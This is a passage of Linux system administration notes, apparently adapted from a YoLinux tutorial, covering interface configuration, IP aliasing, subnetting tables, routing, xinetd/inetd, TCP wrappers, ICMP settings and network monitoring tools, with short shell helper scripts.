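The two ifcfg-eth0 variants above differ in only a few lines, so they can be generated from one helper. A sketch (make_ifcfg is a hypothetical name, and only the fields shown in the text are emitted):

```shell
# Emit a minimal ifcfg-style configuration for static or DHCP setups.
# Usage: make_ifcfg DEVICE dhcp
#        make_ifcfg DEVICE static IPADDR NETMASK
make_ifcfg() {
    dev=$1 mode=$2
    echo "DEVICE=$dev"
    echo "ONBOOT=yes"
    if [ "$mode" = "dhcp" ]; then
        echo "BOOTPROTO=dhcp"
    else
        echo "BOOTPROTO=static"
        echo "IPADDR=$3"
        echo "NETMASK=$4"
    fi
}
make_ifcfg eth0 dhcp
```

Redirect the output into /etc/sysconfig/network-scripts/ifcfg-eth0 and run "service network restart", as above.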

Changing the host name:

This is a three step process:

1. Issue the command: hostname new-host-name
2. Change the network configuration file /etc/sysconfig/network, editing the entry: HOSTNAME=new-host-name
3. Restart systems which relied on the hostname (or reboot):
   o Restart network services: service network restart (or: /etc/init.d/network restart)
   o Restart the desktop: bring the system down to console mode (init 3), then bring X-Windows back up (init 5)

One may also want to check the file /etc/hosts for an entry using the system name which allows the system to be self aware.
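Step 2 of the hostname change is a one-line edit; a sketch that performs it on any file with a HOSTNAME= line (demonstrated here on a throw-away copy rather than the real /etc/sysconfig/network; the helper name is illustrative):

```shell
# Rewrite the HOSTNAME= line of a network config file in place.
set_cfg_hostname() {   # set_cfg_hostname FILE NEW-HOST-NAME
    sed -i "s/^HOSTNAME=.*/HOSTNAME=$2/" "$1"
}

# Demonstration on a temporary copy:
cfg=$(mktemp)
printf 'NETWORKING=yes\nHOSTNAME=old-host-name\n' > "$cfg"
set_cfg_hostname "$cfg" new-host-name
grep '^HOSTNAME=' "$cfg"    # HOSTNAME=new-host-name
rm -f "$cfg"
```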

Network IP aliasing:

Assign more than one IP address to one ethernet card:

ifconfig eth0 XXX.XXX.XXX.XXX netmask 255.255.255.0 broadcast XXX.XXX.XXX.255
ifconfig eth0:0 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255
ifconfig eth0:1 192.168.10.14 netmask 255.255.255.0 broadcast 192.168.10.255

--------------------------------------------------------------------------------------
MINE: with this approach the file /etc/sysconfig/network-scripts/ifcfg-eth0:0 is not written for me. This works instead:

netconfig -d eth0:0 [--gateway=xxx.xxx.xxx.xxx] --ip=192.168.10.12 --netmask=255.255.255.0

After a "service network restart" the file is written correctly.
--------------------------------------------------------------------------------------

route add -host XXX.XXX.XXX.XXX dev eth0
route add -host 192.168.10.12 dev eth0
route add -host 192.168.10.14 dev eth0

In this example 0 and 1 are aliases in addition to the regular eth0. The result of the ifconfig command:

eth0  Link encap:Ethernet  HWaddr 00:10:4C:25:7A:3F
      inet addr:XXX.XXX.XXX.XXX  Bcast:XXX.XXX.XXX.255  Mask:255.255.255.0
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      RX packets:14218 errors:0 dropped:0 overruns:0 frame:0
      TX packets:1362 errors:0 dropped:0 overruns:0 carrier:0
      collisions:1 txqueuelen:100
      Interrupt:5 Base address:0xe400

Page 37: Appunti Informatica

eth0:0  Link encap:Ethernet  HWaddr 00:10:4C:25:7A:3F
        inet addr:192.168.10.12  Bcast:192.168.10.255  Mask:255.255.255.0
        UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
        Interrupt:5 Base address:0xe400

eth0:1  Link encap:Ethernet  HWaddr 00:10:4C:25:7A:3F
        inet addr:192.168.10.14  Bcast:192.168.10.255  Mask:255.255.255.0
        UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
        Interrupt:5 Base address:0xe400

Config file: /etc/sysconfig/network-scripts/ifcfg-eth0:0

DEVICE=eth0:0
ONBOOT=yes
BOOTPROTO=static
BROADCAST=192.168.10.255
IPADDR=192.168.10.12
NETMASK=255.255.255.0
NETWORK=192.168.10.0

Aliases can also be shut down independently, i.e.: ifdown eth0:0

The option during kernel compile is: CONFIG_IP_ALIAS=y (enabled by default in Red Hat)

Note: The Apache web server can be configured so that different IP addresses can be assigned to specific domains being hosted. See Apache configuration and "configuring an IP based virtual host" in the YoLinux Web site configuration tutorial.
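The per-alias config files all follow one pattern, so they can be generated in a loop. A sketch (emit_alias_cfg is a hypothetical helper; the 255.255.255.0 netmask is assumed from the example above):

```shell
# Print one ifcfg-DEV:N block per alias address, numbered from 0.
emit_alias_cfg() {   # emit_alias_cfg DEVICE IP...
    dev=$1; shift
    i=0
    for ip in "$@"; do
        printf 'DEVICE=%s:%d\nONBOOT=yes\nBOOTPROTO=static\nIPADDR=%s\nNETMASK=255.255.255.0\n\n' \
               "$dev" "$i" "$ip"
        i=$((i + 1))
    done
}
emit_alias_cfg eth0 192.168.10.12 192.168.10.14
```

Redirect each block into the matching /etc/sysconfig/network-scripts/ifcfg-eth0:N file.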

DHCP Linux client - get connection info: /sbin/pump -i eth0 --status (Red Hat Linux 7.1 and older)

Device eth0
IP: 4.XXX.XXX.XXX
Netmask: 255.255.252.0
Broadcast: 4.XXX.XXX.255
Network: 4.XXX.XXX.0
Boot server 131.XXX.XXX.4
Next server 0.0.0.0
Gateway: 4.XXX.XXX.1
Domain: vz.dsl.genuity.net
Nameservers: 4.XXX.XXX.1 4.XXX.XXX.2 4.XXX.XXX.3
Renewal time: Sat Aug 11 08:28:55 2001
Expiration time: Sat Aug 11 11:28:55 2001

Activating and De-Activating your NIC:

Commands for starting and stopping TCP/IP network services on an interface:

Activate: /sbin/ifup eth0 (Also: ifconfig eth0 up - Note: Even if no IP address is assigned you can listen.)

De-Activate: /sbin/ifdown eth0 (Also: ifconfig eth0 down)

These scripts use the scripts and NIC config files in /etc/sysconfig/network-scripts/

Page 38: Appunti Informatica

GUI interface control/configuration:

Start/stop network interfaces:
  /usr/bin/system-control-network (Fedora Core 2/3)
  /usr/bin/redhat-control-network (RH 9.0 - FC-1)

Configure an Ethernet, ISDN, modem, Token Ring, Wireless or DSL network connection:
  /usr/sbin/system-config-network-druid (FC2/3)
  /usr/sbin/redhat-config-network-druid (RH 9 - FC-1)

Subnets:

MASK  # SUBNETS  SLASH  CLASS A HOSTS  CLASS A MASK  CLASS B HOSTS  CLASS B MASK  CLASS C HOSTS  CLASS C MASK     CLASS C SUB HOSTS          CLASS C SUB MASK
255   1 or 256   /32    16,777,214     255.0.0.0     65,534         255.255.0.0   254            255.255.255.0    invalid (1 address)        255.255.255.255
254   128        /31    33,554,430     254.0.0.0     131,070        255.254.0.0   510            255.255.254.0    invalid (2 addresses)      255.255.255.254
252   64         /30    67,108,862     252.0.0.0     262,142        255.252.0.0   1,022          255.255.252.0    2 hosts (4 addresses)      255.255.255.252
248   32         /29    134,217,726    248.0.0.0     524,286        255.248.0.0   2,046          255.255.248.0    6 hosts (8 addresses)      255.255.255.248
240   16         /28    268,435,454    240.0.0.0     1,048,574      255.240.0.0   4,094          255.255.240.0    14 hosts (16 addresses)    255.255.255.240
224   8          /27    536,870,910    224.0.0.0     2,097,150      255.224.0.0   8,190          255.255.224.0    30 hosts (32 addresses)    255.255.255.224
192   4          /26    1,073,741,822  192.0.0.0     4,194,302      255.192.0.0   16,382         255.255.192.0    62 hosts (64 addresses)    255.255.255.192
128   2          /25    2,147,483,646  128.0.0.0     8,388,606      255.128.0.0   32,766         255.255.128.0    126 hosts (128 addresses)  255.255.255.128

Binary position:   8    7    6    5    4    3    2    1
Value:           128   64   32   16    8    4    2    1
Example: 192       1    1    0    0    0    0    0    0

Example: 192 = 128 + 64.

Some addresses are reserved and outside this scope: loopback (127.0.0.1), reserved class C 192.168.XXX.XXX, reserved class B 172.16.XXX.XXX - 172.31.XXX.XXX, and reserved class A 10.XXX.XXX.XXX.

Subnet Example:

Your ISP assigns you a subnet mask of 255.255.255.248 for your office:

208.88.34.104  Network base address
208.88.34.105  Computer 1
208.88.34.106  Computer 2
208.88.34.107  Computer 3
208.88.34.108  Computer 4
208.88.34.109  Computer 5
208.88.34.110  DSL router/gateway
208.88.34.111  Broadcast address

Of the eight addresses, six are assigned to hardware systems and ultimately only five are usable addresses.
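The arithmetic in the office example above can be reproduced with plain shell integer math. A sketch (subnet_info is an illustrative helper; "usable" counts every address except the network and broadcast addresses, so it still includes the gateway):

```shell
# Compute network address, broadcast address and usable host count
# for IP/PREFIX using shell integer arithmetic.
subnet_info() {   # subnet_info IP PREFIX
    ip=$1 prefix=$2
    # Split the dotted quad into the positional parameters.
    oldifs=$IFS; IFS=.; set -- $ip; IFS=$oldifs
    n=$(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
    mask=$(( (4294967295 << (32 - prefix)) & 4294967295 ))
    net=$(( n & mask ))
    bcast=$(( net | (~mask & 4294967295) ))
    dotted() {
        echo "$(( $1 >> 24 & 255 )).$(( $1 >> 16 & 255 )).$(( $1 >> 8 & 255 )).$(( $1 & 255 ))"
    }
    echo "network=$(dotted $net) broadcast=$(dotted $bcast) usable=$(( (1 << (32 - prefix)) - 2 ))"
}
subnet_info 208.88.34.105 29   # the /29 (255.255.255.248) office example above
```

For the example address this prints network=208.88.34.104, broadcast=208.88.34.111 and usable=6, matching the list above.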

Links:
  What's A Netmask And Why Do I Need One?
  Subnet Cheat Sheet
  Subnet calculator
  CIDR Conversion Table
  Table of subnets
  IP Subnetting, Variable Subnetting, and CIDR (Supernetting)
  CISCO.com: Subnet Masking and Addressing

Network Classes:

The concept of network classes is somewhat obsolete, as subnets are now used to define smaller networks. These subnets may be part of a class A, B, C, etc. network. For historical reference the network classes are defined as follows:

Class A: Defined by the first 8 bits with a range of 0 - 127. The first number (8 bits) is defined by Internic, i.e. 77.XXX.XXX.XXX. One class A network can define 16,777,214 hosts. Range: 0.0.0.0 - 127.255.255.255

Class B: Defined by the first 8 bits with a range from 128 - 191. The first two numbers (16 bits) are defined by Internic, i.e. 182.56.XXX.XXX. One class B network can define 65,534 hosts. Range: 128.0.0.0 - 191.255.255.255

Class C: Defined by the first 8 bits with a range from 192 - 223. The first three numbers (24 bits) are defined by Internic, i.e. 220.56.222.XXX. One class C network can define 254 hosts. Range: 192.0.0.0 - 223.255.255.255

Class D: Defined by the first 8 bits with a range from 224 - 239. This is reserved for multicast networks (RFC988). Range: 224.0.0.0 - 239.255.255.255

Class E: Defined by the first 8 bits with a range from 240 - 255. This is reserved for experimental use. Range: 240.0.0.0 - 255.255.255.255
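The class boundaries above reduce to a comparison on the first octet. A sketch (ip_class is an illustrative helper using the historical ranges from the text):

```shell
# Classify an IPv4 address by its first octet, per the historical classes.
ip_class() {
    first=${1%%.*}    # strip everything after the first dot
    if   [ "$first" -le 127 ]; then echo "A"
    elif [ "$first" -le 191 ]; then echo "B"
    elif [ "$first" -le 223 ]; then echo "C"
    elif [ "$first" -le 239 ]; then echo "D (multicast)"
    else                            echo "E (experimental)"
    fi
}
ip_class 77.1.2.3      # A
ip_class 182.56.1.1    # B
ip_class 224.0.0.1     # D (multicast)
```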

Enable Forwarding:

Forwarding allows network packets on one network interface (i.e. eth0) to be forwarded to another network interface (i.e. eth1). This allows the Linux computer to connect ("ethernet bridge") or route network traffic. The bridge configuration will merge two (or several) networks into one single network topology. IpTables firewall rules can be used to filter traffic. A router configuration can support multicast and basic IP routing using the "route" command. IP masquerading (NAT) can be used to connect private local area networks (LAN) to the internet or load balance servers.

Page 40: Appunti Informatica

Turn on IP forwarding to allow the Linux computer to act as a gateway or router:

echo 1 > /proc/sys/net/ipv4/ip_forward

The default is 0. One can add firewall rules by using ipchains.

Another method is to alter the Linux kernel config file /etc/sysctl.conf, setting the following value:

net.ipv4.ip_forward = 1

See the file /etc/sysconfig/network for storing this configuration:

FORWARD_IPV4=true

Change the default "false" to "true".

All methods result in a proc file value of "1". Test: cat /proc/sys/net/ipv4/ip_forward

The TCP man page (Linux Programmer's Manual) and /usr/src/linux/Documentation/proc.txt (kernel 2.2, RH 7.0-) [alt link] cover the /proc/sys/net/ipv4/* file descriptions. Also see: (YoLinux tutorials)

Configure Linux as an internet gateway router: Using Linux and iptables/ipchains to set up an internet gateway for home or office (iptables)

Load balancing servers using LVS (Linux Virtual Server) (ipvsadm)

Adding a network interface card (NIC):

Manual method: this does not alter the permanent configuration and will only configure support until the next reboot.

cd /lib/modules/2.2.5-15/net/ - Use the kernel version for your system. This example uses 2.2.5-15.

Here you will find the modules supported by your system. A module can be permanently added to /etc/modules.conf (or for older systems: /etc/conf.modules). Example:

alias eth0 3c59x

/sbin/insmod -v 3c59x (For a 3Com ethernet card)
ifconfig ...

The easy way: Red Hat versions 6.2 and later ship with Kudzu, a device detection program which runs during system initialization (/etc/rc.d/init.d/kudzu). It can detect a newly installed NIC and load the appropriate driver. Then use /usr/sbin/netconfig to configure the IP address and network settings. The configuration will be stored so that it is used upon system boot.

Systems with two NIC cards: typically two cards are used when connecting to two networks. In this case the device must be defined using one of three methods:

1. Use the Red Hat GUI tool /usr/bin/netcfg

OR

2. Define network parameters in configuration files:

Define new device in file (Red Hat/Fedora) /etc/sysconfig/network-scripts/ifcfg-eth1 (S.u.s.e 9.2: /etc/sysconfig/network/ifcfg-eth-id-XX:XX:XX:XX:XX)

DEVICE=eth1
BOOTPROTO=static
IPADDR=192.168.10.12
NETMASK=255.255.255.0
GATEWAY=XXX.XXX.XXX.XXX
HOSTNAME=node-name.name-of-domain.com
DOMAIN=name-of-domain.com

Page 41: Appunti Informatica

Special routing information may be specified, if necessary, in the file (Red Hat/Fedora): /etc/sysconfig/static-routes (S.u.s.e. 9.2: /etc/sysconfig/network/routes)

Example: eth1 net XXX.XXX.XXX.0 netmask 255.255.255.0 gw XXX.XXX.XXX.XXX

OR 3. Define network parameters using Unix command line interface:

Define IP address:

ifconfig eth0 XXX.XXX.XXX.XXX netmask 255.255.255.0 broadcast XXX.XXX.XXX.255
ifconfig eth1 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255

If necessary, define a route with the route command. Examples:

route add default gw XXX.XXX.XXX.XXX dev eth0
route add -net XXX.XXX.XXX.0 netmask 255.255.255.0 gw XXX.XXX.XXX.XXX dev eth0

Where XXX.XXX.XXX.XXX is the gateway to the internet as defined by your ISP or network operator.

If a mistake is made just repeat the route command substituting "del" in place of "add".

Configuring your NIC: Speed and Duplex settings:

This is usually not necessary because most ethernet adapters can auto-negotiate link speed and duplex setting.

List NIC speed and configuration:

mii-tool
eth0: negotiated 100baseTx-FD flow-control, link ok

Verbose mode:

mii-tool -v
eth0: negotiated 100baseTx-FD flow-control, link ok
  product info:  Intel 82555 rev 4
  basic mode:    autonegotiation enabled
  basic status:  autonegotiation complete, link ok
  capabilities:  100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD
  advertising:   100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD flow-control
  link partner:  100baseTx-FD 100baseTx-HD 10baseT-FD 10baseT-HD flow-control

Set NIC configuration: mii-tool -F option

Option  Parameters
-F      100baseTx-FD, 100baseTx-HD, 10baseT-FD, 10baseT-HD
-A      100baseT4, 100baseTx-FD, 100baseTx-HD, 10baseT-FD, 10baseT-HD

Page 42: Appunti Informatica

Query NIC with ethtool:

Command Description

ethtool -g eth0 Queries ethernet device for rx/tx ring parameter information.

ethtool -a eth0 Queries ethernet device for pause parameter information.

ethtool -c eth0 Queries ethernet device for coalescing information.

ethtool -i eth0 Queries ethernet device for associated driver information.

ethtool -d eth0 Prints a register dump for the specified ethernet device.

ethtool -k eth0 Queries ethernet device for offload information.

ethtool -S eth0 Queries ethernet device for NIC and driver statistics.

Man pages:
  mii-tool - view, manipulate media-independent interface status
  ethtool - display or change ethernet card settings

Route:

Static routes: IP (Internet Protocol) uses a routing table to determine where packets should be sent. First the packet is examined to see if its destination is on the local or a remote network. If it is to be sent to a remote network, the routing table is consulted to determine the path. If there is no information in the routing table then the packet is sent to the default gateway. Static routes are set with the route command and with the configuration file (Red Hat/Fedora) /etc/sysconfig/network-scripts/route-eth0 (Red Hat 7: /etc/sysconfig/static-routes; S.u.s.e. 9.2: /etc/sysconfig/network/routes):

10.2.3.0/16 via 192.168.10.254

See command: /etc/sysconfig/network-scripts/ifup-routes eth0

Dynamic routes: RIP (Routing Information Protocol) is used to define dynamic routes. If multiple routes are possible, RIP will choose the shortest route (fewest hops between routers, not physical distance). Routers use RIP to broadcast the routing table over UDP port 520, and then add new or improved routes to their routing tables.

Man pages:

route - show / manipulate the IP routing table (static routes). Examples:

o Show routing table: route -e
o Access an individual computer host via network interface card eth1:
  route add -host 123.213.221.231 eth1
o Access an ISP network identified by a network address and netmask using network interface card eth0:
  route add -net 10.13.21.0 netmask 255.255.255.0 gw 192.168.10.254 eth0
  Conversely: route del -net 10.13.21.0 netmask 255.255.255.0 gw 192.168.10.254 eth0
o Specify the default gateway used to access remote networks via network interface card eth0:
  route add default gw 201.51.31.1 eth0
  (The gateway can also be defined in /etc/sysconfig/network)

Page 43: Appunti Informatica

DOS:

route -p add 192.168.8.0 mask 255.255.255.0 10.40.5.101

(-p makes the route persistent; the last argument is the gateway)

o Specify two gateways for two network destinations (i.e. one external, one internal private network; two routers/gateways will be specified):
  Add the internet gateway as before: route add default gw 201.51.31.1 eth0
  Add the second private network: route add -net 10.0.0.0 netmask 255.0.0.0 gw 192.168.10.254 eth0

routed - network routing daemon. Uses the RIP protocol to update the routing table.
ipx_route - show / manipulate the IPX routing table. IPX is the Novell networking protocol (not typically used unless your office has Novell servers).
ifuser - identify destinations routed to a particular network interface.

VPN, Tunneling:

Commercial VPN Linux software solutions - YoLinux
CIPE: Crypto IP Encapsulation (easiest way to configure two Linux gateways connecting two private networks over the internet with encryption):
  o CIPE Home page - CIPE is a simple encapsulation system that securely connects two subnets.
  o VPN, Firewall, Gateway Mini How To - Keith Hasely
  o The Linux Cipe+Masquerading mini-HOWTO - Anthony Ciaravalo
Freeswan IPSec - An IPSec project for Linux (known as Freeswan and KLIPS).
GRE Tunneling - Hugo Samayoa
VPN HowTo - Matthew D. Wilson
Linux VPN support - PPTP, L2TP, PPP over SSH tunnel; VPN support working with 128-bit RC4 encryption. By Michael Elkins
Installing and Running PPTP on Linux
Tunnel Vision VPN for Linux - creates an encrypted VPN between two Tunnel Vision-capable sites.
Linux VPN Masquerade
Cerberus - an IPsec implementation for Linux
L2TPD - Layer Two Tunneling Protocol (for PPP)
L2TP Extensions (l2tpext) Internet Drafts
Description of the CISCO VPN at Cal Tech - supports Linux (kernel 2.2), Solaris, MS/Windows 95/98/ME/NT/2000, Mac OS X/7.6-9.x

Useful Linux networking commands:

/etc/rc.d/init.d/network start - command to start, restart or stop the network
netstat - display connections, routing tables, stats etc.
  o List externally connected processes: netstat -punta
  o List all connected processes: netstat -nap
  o Show network statistics: netstat -s
  o Kernel interface table info: netstat -a -i eth0
ping - send ICMP ECHO_REQUEST packets to network hosts. Use Ctrl-C to stop ping.
traceroute - print the route packets take to a network host
  o traceroute IP-address-of-server
  o traceroute domain-name-of-server
mtr - a network diagnostic tool introduced in Fedora. Like traceroute except it gives more network quality and network diagnostic info. Leave it running to get real-time stats. Reports best and worst round trip times in milliseconds.
  o mtr IP-address-of-server
  o mtr domain-name-of-server

Page 44: Appunti Informatica

whois - look up a domain name in the Internic whois database.
finger - display information on a system user, i.e. finger user@host. Uses the $HOME/.plan and $HOME/.project user files. Often used by game developers. See http://finger.planetquake.com/
iptables - IP firewall administration (Linux kernel 2.6/2.4). See the YoLinux firewall/gateway configuration.
ipchains - IP firewall administration (Linux kernel 2.2). See the YoLinux firewall/gateway configuration.
socklist - display a list of open sockets, type, port, process id and the name of the process. Kill with fuser or kill.
host - given a host name, the command returns the IP address. Unlike nslookup, the host command uses both /etc/hosts and DNS. Example: host domain-name-of-server
nslookup - given a host name, the command returns the IP address. Also see Testing your DNS (YoLinux tutorial). Note that nslookup does not use the /etc/hosts file.

inetd/xinetd: Network Socket Listener Daemons:

The network listening daemons listen and respond to all network socket connections made on the TCP/IP ports assigned to them. The ports are defined by the file /etc/services. When a connection is made, the listener attempts to invoke the assigned program and pipe the data to it. This simplifies matters by allowing the assigned program to read from stdin instead of making its own socket connection; the listener handles the network socket connection. Two network listening and management daemons have been used in Red Hat Linux distributions:

inetd: Red Hat 6.x and older xinetd: Red Hat 7.0-9.0, Fedora Core

inetd:

Configuration file: /etc/inetd.conf

Entries in this file consist of a single line made up of the following fields:

service socket-type protocol wait user server cmdline

service: The name assigned to the service. Matches the name given in the file /etc/services socket-type:

o stream: connection protocols (TCP) o dgram: datagram protocols (UDP) o raw o rdm o seqpacket

protocol: Transport protocol name which matches a name in the file /etc/protocols. i.e. udp, icmp, tcp, rpc/udp, rpc/tcp, ip, ipv6

wait: Applies only to datagram protocols (UDP). o wait[.max]: One server for the specified port at any time (RPC) o nowait[.max]: Continue to listen and launch new services if a new connection is made.

(multi-threaded)

Max refers to the maximum number of server instances spawned in 60 seconds. (default=40)

user[.group]: login id of the user the process is executed under. Often nobody, root or a special restricted id for that service.

server: Full path name of the server program to be executed.
cmdline: Command line to be passed to the server. This includes argument 0 (argv[0]), that is, the command name. This field is empty for internal services. Examples of internal TCP services: echo, discard, chargen (character generator), daytime (human-readable time), and time (machine-readable time). (See the RFCs.)

Page 45: Appunti Informatica

Sample File: /etc/inetd.conf
#echo stream tcp nowait root internal
#echo dgram udp wait root internal
ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a
#pop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d
#swat stream tcp nowait.400 root /usr/sbin/swat swat

A line may be commented out by using a '#' as the first character in the line. This will turn the service off. The maximum length of a line is 1022 characters. The inet daemon must be restarted to pick up the changes made to the file: /etc/rc.d/init.d/inetd restart For more information see the man pages "inetd" and "inetd.conf".

xinetd: Extended Internet Services Daemon:
Xinetd has access control mechanisms, logging capabilities, the ability to make services available based on time, and can place limits on the number of servers started, redirect services to different ports, network interfaces (NICs) or even a different server, chroot a service, etc., and is thus a worthy upgrade from inetd. Use the command chkconfig --list to view all system services and their state. It will also list all network services controlled by xinetd, and their respective state, under the title "xinetd based services". (Works for xinetd (RH 7.0+) but not inetd.) The xinetd network daemon uses PAM, also called network wrappers, which consult the /etc/hosts.allow and /etc/hosts.deny files. Configuration file: /etc/xinetd.conf, which in turn uses configuration files found in the directory /etc/xinetd.d/. To turn a network service on or off:

Edit the file /etc/xinetd.d/service-name and set the disable value:

disable = yes or disable = no

Restart the xinetd process using the signal:

o SIGUSR1 (kill -SIGUSR1 process-id) - Soft reconfiguration does not terminate existing connections. (Important if you are connected remotely)

o SIGUSR2 - Hard reconfiguration stops and restarts the xinetd process.

(Note: Using the HUP signal will terminate the process.) OR

Use the chkconfig command: chkconfig service-name on (or off) This command will also restart the xinetd process to pick up the new configuration.

The file contains entries of the form:
service service-name
{
attribute assignment-operator value value ...
...
}


Where: attribute:

o disable: yes or no
o type: combination of:
RPC
INTERNAL: service provided by xinetd itself
UNLISTED: not found in /etc/rpc or /etc/services

o id: By default the service id is the same as the service name.
o socket_type:
stream: TCP
dgram: UDP
raw: direct IP access
seqpacket: service that requires reliable sequential datagram transmission

o flags: Combination of: REUSE, INTERCEPT, NORETRY, IDONLY, NAMEINARGS, NODELAY, DISABLE, KEEPALIVE, NOLIBWRAP. See the xinetd man page for details.

o protocol: Transport protocol name which matches a name in the file /etc/protocols.
o wait:
no: multi-threaded
yes: single-threaded - one server for the specified port at any time (RPC)
o user: See file: /etc/passwd
o group: See file: /etc/group
o server: Program to execute and receive the data stream from the socket. (Fully qualified name - full path name of the program.)
o server_args: Unlike inetd, arg[0], the name of the service, is not passed.
o only_from: IP address, factorized address, netmask range, hostname or network name from the file /etc/networks.
o no_access: Deny from ... (inverse of only_from)
o access_times
o port: See file /etc/services

Also: log_type, log_on_success, log_on_failure (Log options: += PID,HOST,USERID,EXIT,DURATION,ATTEMPT and RECORD), rpc_version, rpc_number, env, passenv, redirect, bind, interface, banner, banner_success, banner_fail, per_source, cps, max_load, groups, enabled, include, includedir, rlimit_as, rlimit_cpu, rlimit_data, rlimit_rss, rlimit_stack. The best source of information is the man page and its many examples.

assignment-operator:
o =
o +=: add a value to the set of values
o -=: delete a value from the set of values

Then restart the daemon: /etc/rc.d/init.d/xinetd restart
Example from the man page: limit telnet sessions to 8 Mbytes of memory and a total of 20 CPU seconds for child processes.
service telnet
{
socket_type = stream
wait = no
nice = 10
user = root
server = /usr/etc/in.telnetd
rlimit_as = 8M
rlimit_cpu = 20
}

[Pitfall] Red Hat 7.1 with updates as of 07/06/2001 required that I restart the xinetd services before FTP would work properly even though xinetd had started without failure during the boot sequence. I have no explanation as to why this occurs or how to fix it other than to restart xinetd: /etc/rc.d/init.d/xinetd restart. Man Pages:

xinetd xinetd.conf xinetd.log tcpd

For more info see:
macsecurity.org: xinetd tutorial - by curator
LinuxFocus.org: xinetd - Frederic Raynal
RedHat.com: Controlling Access to Services
http://www.xinetd.org
See RFCs: 862, 863, 864, 867, 868, 1413.
Man pages: xinetd, xinetd.conf, xinetd.log

RPC: Remote Procedure Calls (Portmapper)
Portmapper is a network service required to support RPCs. Many services, such as NFS (file sharing services), require portmapper. List the RPC services supported: [root]# rpcinfo -p localhost
Starting the portmap server:
/etc/rc.d/init.d/portmap start
service portmap start (Red Hat/Fedora Core)

Man Pages: portmap rpcinfo pmap_set pmap_dump

PAM: Network Wrappers:
Pluggable Authentication Modules for Linux (TCP Wrappers). This system allows or denies network access. One can reject or allow specific IP addresses or subnets access to your system.
File: /etc/hosts.allow
in.ftpd:208.188.34.105

This specifically allows the given IP address to ftp to your system. One can also specify an entire domain, i.e. .name-of-domain.com - note the leading ".".
File: /etc/hosts.deny
ALL:ALL

This generally denies any access. See the pam man page. File: /etc/inetd.conf

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a


The inet daemon accepts the incoming network stream and assigns it to the PAM TCP wrapper, /usr/sbin/tcpd, which accepts or denies the network connection as defined by /etc/hosts.allow and /etc/hosts.deny and then passes it along to ftp. This is logged to /var/log/secure

Advanced PAM: More specific access can be assigned and controlled by controlling the level of authentication required for access. Files reflect the inet service name. Rules and modules are stacked to achieve the level of security desired. See the files in /etc/pam.d/... (some systems use /etc/pam.conf) The format: service type control module-path module-arguments

auth - (type) Password is required for the user
o nullok - null or non-existent password is acceptable
o shadow - encrypted passwords are kept in /etc/shadow

account - (type) Verifies the password. Can track and force password changes.
password - (type) Controls password updates
o retry=3 - sets the number of login attempts
o minlen=8 - sets the minimum length of the password
session - (type) Controls monitoring

Modules:
/lib/security/pam_pwdb.so - password database module
/lib/security/pam_shells.so
/lib/security/pam_cracklib.so - checks if a password is crackable
/lib/security/pam_listfile.so
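As an illustration of the format above, a hypothetical stack for an ftp-style service might look like the following (in /etc/pam.d/ the service column is implied by the file name; the module paths and options shown are examples only, not a recommended policy):

```
# /etc/pam.d/ftp  (illustrative example)
# type    control     module-path                    module-arguments
auth      required    /lib/security/pam_listfile.so  item=user sense=deny file=/etc/ftpusers onerr=succeed
auth      required    /lib/security/pam_pwdb.so      shadow nullok
account   required    /lib/security/pam_pwdb.so
session   required    /lib/security/pam_pwdb.so
```

Each line is tried in order; with the control flag "required", every listed module must succeed for access to be granted.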

After re-configuration, restart the inet daemon: killall -HUP inetd For more info see:

Wietse's Papers Pluggable Authentication Modules for Linux (PAM) Home Page

ICMP:
ICMP is the network protocol used by the ping and traceroute commands. ICMP redirect packets are sent from the router to a host to inform the host of a better route. To enable acceptance of ICMP redirects, add the following line to /etc/sysctl.conf:

net.ipv4.conf.all.accept_redirects = 1

Add the following to the file /etc/rc.d/rc.local:
for f in /proc/sys/net/ipv4/conf/*/accept_redirects
do
echo 1 > $f
done

Command to view the kernel IP routing cache: /sbin/route -Cn
NOTE: This may leave you vulnerable, as attackers may alter your routes.

Blocking ICMP to look invisible to ping:
The following firewall rules will drop ICMP requests.

Iptables: iptables -A OUTPUT -p icmp -d 0/0 -j DROP

Ipchains: ipchains -A output -p icmp -d 0/0 -j DENY

Or drop all incoming pings:
echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

This is sometimes necessary to look invisible to DOS (Denial of Service) attackers, who use ping to watch your machine and launch an attack when its presence is detected.


Network Monitoring Tools: tcpdump - dump traffic on a network. See discussion below.

Command line option Description

-c Exit after receiving count packets.

-C Specify size of output dump files.

-i Specify interface if multiple exist. Lowest used by default. i.e. eth0

-w file-name Write the raw packets to a file rather than parsing and printing them out. They can later be printed with the -r option.

-n Improve speed by not performing DNS lookups. Report IP addresses.

-t Don't print a timestamp on each dump line.

Filter expressions:

primitive Description

host host-name If host has multiple IP's, all will be checked.

net network-number Network number.

net network-number mask mask Network number and netmask specified.

port port-number Port number specified.

tcp Sniff TCP packets.

udp Sniff UDP packets.

icmp Sniff icmp packets.

Examples: o tcpdump tcp port 80 and host server-1 o tcpdump ip host server-1 and not server-2

iptraf - Interactive Colorful IP LAN Monitor nmap - Network exploration tool and security scanner

o List pingable nodes on network: nmap -sP 192.168.0.0/24 Scans network for IP addresses 192.168.0.0 to 192.168.0.255 using ping.

Ethereal - Network protocol analyzer. Examine data from a live network.

RPMs required:
o ethereal-0.8.15-2.i386.rpm - Red Hat 7.1 Powertools CD RPM
o ucd-snmp-4.2-12.i386.rpm - Red Hat 7.1 binary CD 1
o ucd-snmp-utils-4.2-12.i386.rpm - Red Hat 7.1 binary CD 1
o Also: gtk+, glib, glibc, XFree86-libs-4.0.3-5 (base install)

There is an error in the ethereal package: it does not list the snmp libraries as dependencies, but you can deduce this from the errors you get if the ucd-snmp libraries are not installed.

EtherApe - Graphical network monitor for Unix modeled after etherman. This is a great network discovery program with cool graphics. (Red Hat Powertools CD 7.1)

Gkrellm - Network and system monitor. Good for monitoring your workstation. (Red Hat Powertools CD)

IPTraf - ncurses-based IP LAN monitor. (Red Hat Powertools CD)
